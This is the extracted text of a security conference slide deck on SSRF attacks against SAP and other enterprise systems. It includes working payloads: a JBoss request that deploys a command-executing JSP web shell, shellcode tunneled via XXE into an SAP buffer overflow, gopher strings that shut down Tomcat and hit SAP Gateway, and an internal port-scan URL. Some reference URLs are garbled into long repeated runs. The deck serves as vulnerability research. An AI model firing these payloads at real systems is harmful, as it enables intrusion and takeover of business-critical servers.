invest in security · invest in security to secure investments ssrf vs. business-critical...

Invest in securityto secure investments

SSRF VS. BUSINESS-CRITICAL APPLICATIONSPART 2: NEW VECTORS AND CONNECT-BACK ATTACKS

Alexander Polyakov – CTO at ERPScan

Alexander Polyakov

Business application security expert

ERPScan

Leading SAP AG partner in the field of discovering security vulnerabilities by the number of found vulnerabilities

• Developers of “ERPScan Security Scanner for SAP”

• Leader by the number of acknowledgements from SAP ( >60 )

• Invited to talk at more than 30 key security conferencesworldwide (BlackHat (US/EU/DC/UAE), RSA, Defcon, HITB)

• First to release software for NetWeaver J2EE platform assessment

• Research team with experience in different areas of security fromERP and web security to mobile, embedded devices, and criticalinfrastructure, accumulating their knowledge in SAP research.

• Conducted workshops for SAP

Agenda

• Enterprise applications• SSRF

– History– Types

• SSRF Proxy attacks– Example of Attacking SAP with SSRF

• SSRF Connect-back attacks– Examples

• XXE Scanner• Conclusion

Enterprise applications: Definitions

Business software is generally any software that helps businessto increase its efficiency or measure its performance

• Small (MS Office)

• Medium (CRM, Shops)

• Enterprise (ERP, BW…)

Why are they critical?

Any information an attacker might want, be it a cybercriminal,industrial spy or competitor, is stored in corporate ERP. Thisinformation can include financial, customer or public relations,intellectual property, personally identifiable information andmore. Industrial espionage, sabotage, and fraud or insiderembezzlement may be very effective if targeted at the victim’sERP system, and they can cause significant damage to thebusiness.

Business-critical systems architecture

• Located in a secure subnetwork

• Secured by firewalls

• Monitored by IDS systems

• Regularly patched

Noahhh…

But let’s assume that they are,because it will be much more

interesting to attack them

Secure corporate network

The

Internet

Industrial network

ERP network

Corporate network

But wait.There must be some links!

Real corporate network

The

Internet Industrial network

ERP network

Corporate network

And…Attackers can use them!

Corporate network attack scenario

The

Internet Industrial network

ERP network

Corporate network

But how?

SSRF History: the beginning

• SSRF: Server Side Request Forgery.

• An attack which was discussed in 2008 with very little information about theory and practical examples.

• Like any new term, SSRF doesn’t show us something completely new like a new type of vulnerability. SSRF-style attacks were known before.

SSRF History: Basics

• We send Packet A to Service A

• Service A initiates Packet B to service B

• Services can be on the same host or on different hosts

• We can manipulate some fields of packet B within packet A

• Various SSRF attacks depend on how many fields we can control in packet B

Packet A

Packet B

SSRF history

• DeralHeiland – Shmoocon 2008

– Web Portals Gateway To Information Or A Hole In Our Perimeter Defenses

• Spiderlabs 2012

– http://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.html

• Vorontsov 2012

– SSRF via XXE http://2012.caro.org/presentations/attacks-on-large-modern-web-applications

• ERPScan (Polyakov,Chastuchin) - SSRF vs business critical applications (Gopher protocol) 2012 august

– http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdf

• ssrfsocks by iamultra: a tool for ERPScan’s vulnerability in Gopher

– https://github.com/iamultra/ssrfsocks 2012 august

• Less Known Web App Vulnerabilities: Real World Examples. (From ERPScan paper) 2012 October

• ERPScan - Gopher SSRF in JVM advisory October 2012– http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/

• ERPScan (Polyakov) - SSRF 2.0– http://erpscan.com/category/publications/

• New research will be published at ZeroNights http://2012.zeronights.org/

http://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttp://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/

Ideal SSRF

The idea is to find victim server interfaces that will allowsending packets initiated by the victim server to the localhostinterface of the victim server or to another server secured by afirewall from outside. Ideally, this interface :

• Must allow sending any packet to any host and any port

• Must be accessed remotely without authentication

Why?

In this research, we wanted to :

• Collect the information about SSRF attacks

• Categorize them

• Show examples of SSRF attacks

• Show new potential and real SSRF vectors

SSRF

Trusted SSRFRemote

SSRF

SSRF proxy attack SSRF back connect

SSRF counter attack

Local SSRF

Simp

le

Partial

Full

SSRF proxy attack

Secure network

Corporate network

Packet BPacket BPacket A

SSRF back connect attack

Packet B

Packet C

Packet BPacket A

SSRF proxy attacks

• Trusted SSRF (Can forge requests to remote services butonly to predefined ones)

• Remote SSRF (Can forge requests to any remote IP andport)

– Simple Remote SSRF (No control on app level)

– Partial Remote SSRF (Control in some fields of app level)

– Full Remote SSRF (Control on app level)

Exploiting SSRF

For every SSRF attack, there must be at least 2 vulnerabilities to successfully trigger the attack:

• First vulnerability– Functionality to create/use links (for trusted SSRF)

– Functionality in some service on Server A which allows us to send remote packets (for other types of SSRF)

• Second vulnerability – Insecure link (for trusted SSRF)

– Vuln. in service on server B (for remote SSRF )

– Vuln. in localhost service on server A (for local SSRF)

– Vuln. in client app. on server A (for back-connect SSRF)

Trusted SSRF

• Trusted SSRF in Oracle

– SELECT * FROM myTable@HostB

– EXECUTE Schema.Package.Procedure('Parameter')@HostB

• Trusted SSRF in MSSQL

– Select * from openquery(HostB,'select * from @@version')]

• Trusted SSRF in SAP NetWeaver

– SM59 transaction

• Also Lotus Domino and others

Not so interesting…

First vulnerability (functionality on Server A)

• Unusual calls

• Multiprotocol calls (URI)– In engines (XML)

– In applications

• UNC calls

• HTTP calls

• FTP calls

• LDAP calls

• SSH calls

• Other calls

Functionality on server A: Unusual calls

• Remote port scan

– SAP NetWeaver wsnavigator (sapnote 1394544,871394)

– SAP NetWeaver ipcpricing (sapnote 1545883)

– SAP BusinessObjects viewrpt (sapnote 1583610)

• Remote password bruteforce

– SAP NetWeaver (NDA)

• Other

– Information disclosure by testing if a file or a directory exists

– Timing attacks

– Etc????

Very application-specific. Can be very interesting

Example of unusual calls

• It is possible to scan internal network from the Internet

• Authentication is not required

• SAP NetWeaver J2EE engine is vulnerable

/ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13

& port=31337

& dispatcher=

& targetClient=

& view=

Port scan via ipcpricing JSP

Host is not alive

Port closed

HTTP port

SAP port

Multiprotocol calls (in XML)

• XML seems to be the new TCP.

• Almost all big projects use XML-based data transfer.

• There are a lot of XML-based protocols with different options tocall external resources and thus conduct SSRF attacks.

• There is at least one element type which fits almost all XML-based schemes. The type is: xsd:anyURI.

• URIs also encompass URLs of other schemes (e.g., FTP, gopher,telnet), as well as URNs.

• Popular URIs: http:// ftp:// telnet:// …..

Multiprotocol calls in XML

• XML– XML External Entity– XSD definition

• XML Encryption• XML Signature• WS-Policy• From WS-Security• WS-Addressing• XBRL• ODATA (edmx)

– ODATA External Entity– Other

• BPEL• STRATML

XML Encryption

1.

2.

3.

4.

Successfully Tested

XML Signature

1.

Successfully Tested

WS-Addressing

1.

http://ServerB/

2. http://ServerB/

Successfully Tested (0-day)

WS-Policy

1.

Not Tested

WS-Security

1.

WS-Federation

1.

2. http://ServerB/

3. http://ServerB/

4.

http://ServerB/

Not Tested

XBRL

1.

2.

Not Tested

ODATA (edmx)

The edmx:Reference element specifies external entity models referenced by this EDMX. Referenced models are available in their entirety to referencing models. All entity types, complex types and other named elements in a referenced model can be accessed from a referencing model.

http://www.odata.org/media/30002/OData%20CSDL%20Definition.html

No examples of edmx in the wild (new protocol)

http://www.odata.org/media/30002/OData CSDL Definition.html

ODATA

1.

2.

Still no products for testing (0-day)

STRATML

1. http://ServerB/

Not tested

SOAP

SoapAction?

No Examples

Multiprotocol Calls in Applications

Multiprotocol calls

Not so usual but a potentially big area

• Oracle Database

– UTL_TCP

UNC calls: threats

• Sure you can call UNC path if you have a universal URI

• But if there is no universal engine you can search for UNC

• UNC calls can be used for:

⁻ conducting SMBRelay attack

⁻ reading files from shared folders (open or trusted)

⁻ other vectors which will be discussed later.

Check SMBRelay bible posts from http://erpscan.com/?s=SMBRelay+Bible&x=0&y=0

http://erpscan.com/?s=SMBRelay+Bible&x=0&y=0

UNC calls: applications

• SAP NetWeaver

– From SAP webservices (sapnote 1503579,1498575)

– From RFC functions (sapnote 1554030)

– From SAP transactions, reports (sapnote 1583286)

• Oracle Database

– Listener

– Database commands such as ctxsys.context

• MsSQL Database

• MySQL Database

• FTP servers

• IBM Lotus Domino controller

• VMWare

• Anything that uses XML engine

And much more

HTTP calls: threats

• Sure you can call HTTP path if you have a universal URI

• But if there is no universal engine, you can search for HTTP

• HTTP calls can be used for conducting wide range of attacks on systems which are in one network with Server A

• DoS

• Inf disclosure

• Unauthorized access (like invoker servlets)

• Bruteforcing (users/directories/pages)

• Fingerprinting

• etc

Examples of HTTP attacks are beyond the current research

HTTP calls: applications

• SAP NetWeaver

– Transactions

– Reports

– RFC commands

– Portal portlets

– Portal links

• Oracle Database

– UTL_HTTP

• MsSQL Database

• PostgreSQL Database

• Anything that uses XML engine

And much more

FTP calls threats

• Sure you can call FTP path if you have a universal URI

• FTP is usually possible whenever HTTP is possible

• But if there is no universal engine, you can search for FTP

• FTP calls can be used to conduct wide range of attacks on systems which are in one network with Server A

• DoS

• Inf disclosure

• Unauthorized access (like invoker servlets)

• Bruteforcing (users/directories/pages)

• Fingerprinting

• etc.

Examples of FTP attacks are beyond the current research

FTP calls: applications

• SAP NetWeaver

– Transactions

– Reports

– RFC commands

• Oracle Database

– UTL_HTTP

• PostgreSQL Database

• Anything that uses XML engine

And much more

Other calls

• ldap://– Bruteforce logins

– Information disclosure

• jar:// – Information disclosure

• mailto:

• ssh2://– Bruteforce logins

– Rce?

• gopher:// – XXE Tunneling

• …….

Just the most popular ones

Exploiting Gopher (Example)

XXE Tunneling (Example)

Server B (ERP, HR, BW etc.)

Server A (Portal or XI)

192.168.0.1

172.16.0.1

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1Host: 192.168.0.1:8000

XXE Tunneling to Buffer Overflow (Example)

• A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in sapnote 1487330)

• Hard to exploit because it requires calling an RFC function which calls Kernel function

• But even such a complex attack can be exploited

• Get ready for the hardcore

XXE Tunneling to Buffer Overflow (Hint 1)

• Shellcode size is limited to 255 bytes (name parameter)

• As we don’t have direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back

• But the XML engine saves some XML data in RWX memory

• So we can use egghunter

• Any shellcode can be uploaded

XXE Tunneling to Buffer Overflow: Packet B

POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1Authorization: Basic U1FQKjowMjA3NTk3==Host: company.com:80User-Agent: ERPSCAN Pentesting tool v 0.2Content-Type: text/xml; charset=utf-8Cookie: sap-client=000Content-Length: 2271

dsecdsechffffk4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4M3O4o8M4q0F3417005O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O0t3B3h3i3Z7k0a0q3D0F0p4k2H3l0n3h5L0u7k3P2p0018058N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c053q5M0h3q4t3B0d0D3n4N0G3p082L4s1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V6340065M2Z6M1R112NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494M1D173Q110018049N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T082L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G353948137O074X4V0W4O5Z68615JJOLO9R0T9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaaºÿÿÎ<102;ÊÿBRjCXÍ.<Zt9;¸dsecú¯uê¯uçÿçAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¾«DSEC^ü1+ÔSò:71;ú/9LÿTâ_;@a}Xs§quÚ&#000;ERYëëÆ00;ÿÿéMÿÿÿÿAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

XXE Tunneling to Buffer Overflow (Hint 2)

• Next step is to pack this packet B into Packet A

• We need to insert non-printable symbols

• God bless gopher; it supports urlencode like HTTP

• It will also help us evade attack against IDS systems

POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1Host: sapserver.com:80Content-Length: 7730

XXE Tunneling to Buffer Overflow (Result)

Server B in DMZ(SAP ERP)

Server A on the Internet(SAP XI)

http://company.com

172.16.0.1

POST

/XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1Host: sapserver.com:80

Full control over the internal system through the Internet

So, you can only send one packet by gopher but you can’t control the session…Hmm, actually, sometimes you can.

Session handling by SSRF (trick 1)

• Using Gopher, it is possible to send multiple packets in one session

Just add them like this

– Gopher://[packet1][packet2][packet3].....

– But you must know the session ID or use a protocol without session ID like telnet

Successfully tested for SAP Message Server param. change

gopher://[packet1][packet2][packet3/

Session handling by SSRF (trick 2)

• Just theoretical • Let’s suppose that session is handled by the IP and port of

client• First packet is sent from some random port, for example,

3000• Collect info about the session from the response• Construct the second packet (next time, the source port

will be 3001, 3002… etc.)• Send the second packet until the source port will be 3000

again

Needs testing

Now let’s talk about different SSRF attacks When we attack the same host with SSRF

SSRF back connect attack

• Local SSRF

The idea is to initiate connection to localhost services in Server A

• Counter-attack

The idea of this attack is to send Packet A to Server A . Service must take Packet B and send it to the attacker’s Server C. Server C will make a malformed response to server A and trigger a client-side vulnerability in the application.

Local SSRF

• The first example is local SSRF

• We try to attack localhost ports on the same server with SSRF

• There are a lot of ports listened by OS and applications at localhost and usually they are less secure

Currently working on a database of most interesting ports

But you want examples… OK OK!

Local SSRF to Tomcat shutdown

• Tomcat management port 8005

• Open only for localhost

• gopher://localhost:8005/SHUTDOWN%0d%0a

Successfully exploitable (tnx Alexey Sintsov)

Local SSRF to Oracle Listener

• Problem– An old vulnerability in Oracle listener in Set_log_file– Secured by LOCAL_OS_AUTHENTICATION in 10G

• Attack– User with CONNECT privileges can run UTL_TCP functions– Using UTL_TCP, it is possible to construct any TCP packet and send it to the

listener– Connection will be from a local IP, so we will bypass

LOCAL_OS_AUTHENTICATION restrictions

Tested in early 2008

Local SSRF to JBOSS console

• JBOSS management console service• Even with a simple HTTP request• Open only for localhost

http://localhost:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin%3Aservice%3DDeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=shell.war&argType=java.lang.String&arg1=shell&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3c%25%40%20%70%61%67%65%20%69%6d%70%6f%72%74%3d%22%6a%61%76%61%2e%75%74%69%6c%2e%2a%2c%6a%61%76%61%2e%69%6f%2e%2a%22%25%3e%20%3c%25%20%25%3e%20%3c%48%54%4d%4c%3e%3c%42%4f%44%59%3e%20%3c%46%4f%52%4d%20%4d%45%54%48%4f%44%3d%22%47%45%54%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%73%22%20%41%43%54%49%4f%4e%3d%22%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%74%65%78%74%22%20%4e%41%4d%45%3d%22%63%6f%6d%6d%65%6e%74%22%3e%20%3c%49%4e%50%55%54%20%54%59%50%45%3d%22%73%75%62%6d%69%74%22%20%56%41%4c%55%45%3d%22%53%65%6e%64%22%3e%20%3c%2f%46%4f%52%4d%3e%20%3c%70%72%65%3e%20%3c%25%20%69%66%20%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%21%3d%20%6e%75%6c%6c%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%22%43%6f%6d%6d%61%6e%64%3a%20%22%20%2b%20%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%20%2b%20%22%3c%42%52%3e%22%29%3b%20%50%72%6f%63%65%73%73%20%70%20%3d%20%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%72%65%71%75%65%73%74%2e%67%65%74%50%61%72%61%6d%65%74%65%72%28%22%63%6f%6d%6d%65%6e%74%22%29%29%3b%20%4f%75%74%70%75%74%53%74%72%65%61%6d%20%6f%73%20%3d%20%70%2e%67%65%74%4f%75%74%70%75%74%53%74%72%65%61%6d%28%29%3b%20%49%6e%70%75%74%53%74%72%65%61%6d%20%69%6e%20%3d%20%70%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%3b%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%20%64%69%73%20%3d%20%6e%65%77%20%44%61%74%61%49%6e%70%75%74%53%74%72%65%61%6d%28%69%6e%29%3b%20%53%74%72%69%6e%67%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%77%68%69%6c%65%20%28%20%64%69%73%72%20%21%3d%20%6e%75%6c%6c%20%29%20%7b%20%6f%75%74%2e%70%72%69%6e%74%6c%6e%28%64%69%73%72%29%3b%20%64%69%73%72%20%3d%20%64%69%73%2e%72%65%61%64%4c%69%6e%65%28%29%3b%20%7d%20%7d%20%25%3e%20%3c%2f%70%72%65%3e%20%3c%2f%42%4f%44%59%3e%3c%2f%48%54%4d%4c%3e&argType=boolean&arg4=True

tnx Alexey Sintsov for sploit

Bypass SAP security restrictions

• It is possible to bypass many SAP Security restrictions based on ACL – SAP Gateway

– SAP Message Server

– Other remote services

gopher://172.16.0.1:3301/a%00%00%00%7A%43%4F%4E%54%00%02%00%7A%67%77%2F%6D%61%78%5F%73%6C%65%65%70%00%00%00%00%79%02%00%00%00%00%00%00%28%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%44%DE%D9%00%00%00%00%00%00%00%00%00%70%DE%D9%00%00%00%00%00%EA%1E%43%00%08%38%38%00%00%00%00%00%10%44%59%00%18%44%59%00%00%00%00%00%64%DE%D9%00%79%5F%00%74%08%B5%38%7C%00%00%00%00%79%DE%D9%00%00%00%00%7A%DE%D9%00%B3%56%35%7C%48%EF%38%7C%5F%57%35%7C%0A%00%00%00%B8%EE

Gateway example

Counter-attack SSRF

Counter-attack SSRF

• This is the most interesting way to use SSRF, which was not discussed before .

• We send a command from Server A to our Server C using SSRF, and then we generate a response which will trigger a vulnerability in an application from Server A.

• To be honest, SMBRelay is exactly the what I am talking about

• However, other attacks are also possible.

New life for client-side bugz

Counter-attack on SMB client

• DoS by reading huge files remotely

• SMBRelay

• RCE Vulnerabilities in SMB client

– MS10-006

– MS10-020

– MS11-019

– MS11-043

Looking for a working example of client-side bug

Counter-attack on FTP client

• Memory corruption vulnerabilities in FTP client.

– Some examples https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/

• Client path traversal

– Those types of vulnerabilities are rare nowadays but there are some chances to find them in industrial systems because they were created a long time ago.

Working on real examples

https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/https://www.corelan.be/index.php/2010/10/12/death-of-an-ftp-client/

Counter-attack on HTTP client

The most widespread type of SSRF requests is HTTP. It means that vulnerabilities in embedded HTTP clients (which are used by different XML engines, for example) are the most sought-after part of our future research

– DoS by multiple entities with links to big data

